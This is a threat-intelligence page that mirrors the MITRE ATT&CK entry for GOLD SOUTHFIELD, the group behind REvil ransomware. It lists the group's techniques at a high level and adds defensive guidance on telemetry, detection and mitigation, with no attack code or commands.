Live Active security incident? Get immediate response
MITRE ATT&CK® Group

G0115: GOLD SOUTHFIELD

GOLD SOUTHFIELD is a financially motivated threat group active since at least 2018 that operates the REvil Ransomware-as-a Service (RaaS). GOLD SOUTHFIELD provides backend infrastructure for affiliates recruited on underground forums to perpetrate high value deployments. By early 2020, GOLD SOUTHFIELD started capitalizing on the new trend of stealing data and further extorting the victim to pay for their data to not get publicly leaked.[1][2][3][4]

EnterpriseG0115GroupObject v2.0 Modified
Discuss defensive coverage Back to ATT&CK
Glexia's Take

Analyst context for executives and security teams

Analyst confidence Medium

GOLD SOUTHFIELD matters because ATT&CK describes it as a financially motivated group operating the REvil ransomware-as-a-service model, with affiliates used for high-value deployments and data-theft extortion. For leaders, the decision point is not only “ransomware prevention,” but whether the organization can withstand affiliate-driven intrusion paths that may involve phishing, exposed services, trusted third parties, legitimate remote access tools, and eventual extortion pressure.

Executive priority

Prioritize this as an operational resilience and incident decision-making issue. The supplied relationships connect GOLD SOUTHFIELD to REvil, ConnectWise, external remote services, public-facing application exploitation, phishing, trusted relationships, and software supply chain compromise. Executives should ask whether critical business services, third-party access paths, remote administration tooling, backup recovery, legal/comms extortion procedures, and audit evidence for access control are tested together rather than managed as separate controls.

Technical view

ATT&CK does not provide a dedicated detection section for this group, so coverage should be validated through the related behaviors and software. SOC and IR teams should test visibility for Windows-focused ransomware activity associated with REvil, legitimate remote administration tool use such as ConnectWise, suspicious PowerShell and obfuscated command execution, screen capture behavior, phishing-driven access, exploitation of Internet-facing applications, external remote service abuse, trusted-relationship access, and software supply chain exposure. Because the group object has no specified platforms or tactics, detection engineering should anchor analytics to the relationship set rather than assume a single intrusion path.

Likely telemetry

  • Identity provider and VPN authentication logs for external remote services, unusual access patterns, and third-party logins
  • Endpoint process creation, command-line, PowerShell, script block, and obfuscation-related telemetry
  • Remote administration and support tool logs, including authorized ConnectWise usage where deployed
  • Email security, URL click, attachment, and user-reporting telemetry for phishing-related access
  • Public-facing application, web server, WAF, vulnerability, and exposure management data

Detection direction

  • Start with control-point coverage: identity, endpoint, remote access, exposed applications, email, and third-party access should all produce searchable evidence before writing group-specific detections.
  • Tune detections for suspicious PowerShell and command obfuscation while accounting for legitimate administration scripts to reduce false positives.
  • Baseline approved remote access tools and investigate use outside expected users, hosts, hours, or support workflows; legitimate tools can otherwise appear normal.
  • Correlate initial-access signals, such as phishing, public-facing application alerts, external remote service logins, and trusted-relationship access, with later endpoint execution or remote administration activity.
  • Use REvil as ransomware context, but avoid assuming every ransomware or remote access alert is GOLD SOUTHFIELD without supporting evidence.

Mitigation priorities

  • Harden and monitor external remote services with strong authentication, least privilege, session logging, and rapid disablement procedures.
  • Reduce Internet-facing application risk through asset inventory, patch prioritization, configuration review, and exposure management.
  • Govern legitimate remote administration tools with approved inventories, restricted operators, logging, and alerting on unexpected installation or use.
  • Strengthen phishing resilience through email controls, user reporting, identity protections, and incident playbooks for suspected credential compromise.
  • Review trusted third-party and software supply chain access, especially elevated vendor connectivity into internal or cloud environments.
Analyst notes and limits

The most useful defensive interpretation is the RaaS affiliate model: organizations should expect multiple possible access paths and should validate layered readiness rather than search for one fixed playbook. The ConnectWise relationship is especially important for distinguishing authorized remote support from adversary use of legitimate administration tooling.

The supplied ATT&CK group object does not specify platforms, tactics, or an official detection section. Platform and behavior guidance here is derived from the supplied relationships to REvil, ConnectWise, and related ATT&CK techniques. Local asset inventory, tool usage, identity architecture, vendor access, and incident history are required to assess actual exposure or coverage.

Official MITRE ATT&CK definition

GOLD SOUTHFIELD

GOLD SOUTHFIELD is a financially motivated threat group active since at least 2018 that operates the REvil Ransomware-as-a Service (RaaS). GOLD SOUTHFIELD provides backend infrastructure for affiliates recruited on underground forums to perpetrate high value deployments. By early 2020, GOLD SOUTHFIELD started capitalizing on the new trend of stealing data and further extorting the victim to pay for their data to not get publicly leaked.[1][2][3][4]

View the same entry on attack.mitre.org (MITRE-hosted reference; in-page links above use the Glexia ATT&CK library.)

Glexia analysis

How security teams should use this page

Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.

ATT&CK relationship table

Techniques used

This mirrors the MITRE pattern of making group, software, campaign, and technique relationships scannable. Relationship notes come from mirrored ATT&CK relationship text when available.

9 rows
Domain ID Name Relationship / procedure
Enterprise T1199 Trusted Relationship

GOLD SOUTHFIELD has breached Managed Service Providers (MSP's) to deliver malware to MSP customers.CitationSecureworks REvil September 2019
Enterprise T1190 Exploit Public-Facing Application

GOLD SOUTHFIELD has exploited Oracle WebLogic vulnerabilities for initial compromise.CitationSecureworks REvil September 2019
Enterprise T1113 Screen Capture

GOLD SOUTHFIELD has used the remote monitoring and management tool ConnectWise to obtain screen captures from victim's machines.CitationTetra Defense Sodinokibi March 2020
Enterprise T1219 Remote Access Tools

GOLD SOUTHFIELD has used the cloud-based remote management and monitoring tool "ConnectWise Control" to deploy REvil.CitationTetra Defense Sodinokibi March 2020
Enterprise T1195.002 Compromise Software Supply Chain Sub-technique

GOLD SOUTHFIELD has distributed ransomware by backdooring software installers via a strategic web compromise of the site hosting Italian WinRAR.CitationSecureworks REvil September 2019CitationSecureworks GandCrab and REvil September 2019CitationSecureworks GOLD SOUTHFIELD
Enterprise T1027.010 Command Obfuscation Sub-technique

GOLD SOUTHFIELD has executed base64 encoded PowerShell scripts on compromised hosts.CitationTetra Defense Sodinokibi March 2020
Enterprise T1133 External Remote Services

GOLD SOUTHFIELD has used publicly-accessible RDP and remote management and monitoring (RMM) servers to gain access to victim machines.CitationSecureworks REvil September 2019
Enterprise T1059.001 PowerShell Sub-technique

GOLD SOUTHFIELD has staged and executed PowerShell scripts on compromised hosts.CitationTetra Defense Sodinokibi March 2020
Enterprise T1566 Phishing

GOLD SOUTHFIELD has conducted malicious spam (malspam) campaigns to gain access to victim's machines.CitationSecureworks REvil September 2019
Associated objects

Groups, software, and campaigns

Malware Enterprise

S0496: REvil

REvil is a ransomware family that has been linked to the GOLD SOUTHFIELD group and operated as ransomware-as-a-service (RaaS) since at least April 2019. REvil, which as been used against organizations in the manufacturing, transportation, and electric sectors, is highly configurable and shares code similarities with the GandCrab RaaS.[1][2][3]

Windows
Relationship explorer

All related ATT&CK context

uses · Technique T1199: Trusted Relationship Enterprise uses · Technique T1190: Exploit Public-Facing Application Enterprise uses · Technique T1113: Screen Capture Enterprise uses · Technique T1219: Remote Access Tools Enterprise uses · Technique T1195.002: Compromise Software Supply Chain Enterprise uses · Tool S0591: ConnectWise Enterprise uses · Technique T1027.010: Command Obfuscation Enterprise uses · Technique T1133: External Remote Services Enterprise uses · Malware S0496: REvil Enterprise uses · Technique T1059.001: PowerShell Enterprise uses · Technique T1566: Phishing Enterprise
Change history

Object version and sync metadata

The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE’s own release notes and roadmap, see ATT&CK resources — Updates .

ATT&CK release
19.1
Object version
2.0
Created
Modified
Raw hash
72f889d06ace287b...
Imported snapshots across ATT&CK releases (1)
Release Bundle imported Object version Modified Status Raw hash
19.1 2.0 Current bundle 72f889d06ace…
Raw source

Mirrored ATT&CK source object

The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.

Open mirrored raw JSON Open MITRE-hosted copy
Source references

External references and citations

MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.

  1. [1]
    Secureworks REvil September 2019

    Counter Threat Unit Research Team. (2019, September 24). REvil/Sodinokibi Ransomware. Retrieved August 4, 2020.

    Open source URL
  2. [2]
    Secureworks GandCrab and REvil September 2019

    Secureworks . (2019, September 24). REvil: The GandCrab Connection. Retrieved August 4, 2020.

    Open source URL
  3. [3]
    Secureworks GOLD SOUTHFIELD

    Secureworks. (n.d.). GOLD SOUTHFIELD. Retrieved October 6, 2020.

    Open source URL
  4. [4]
    CrowdStrike Evolution of Pinchy Spider July 2021

    Meyers, Adam. (2021, July 6). The Evolution of PINCHY SPIDER from GandCrab to REvil. Retrieved March 28, 2023.

    Open source URL
  5. [5]
    Pinchy Spider

    (Citation: CrowdStrike Evolution of Pinchy Spider July 2021)

  6. [6]
    mitre-attack G0115
    Open source URL
Source and licensing

Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.

Official MITRE ATT&CK site Official STIX data repository MITRE ATT&CK terms of use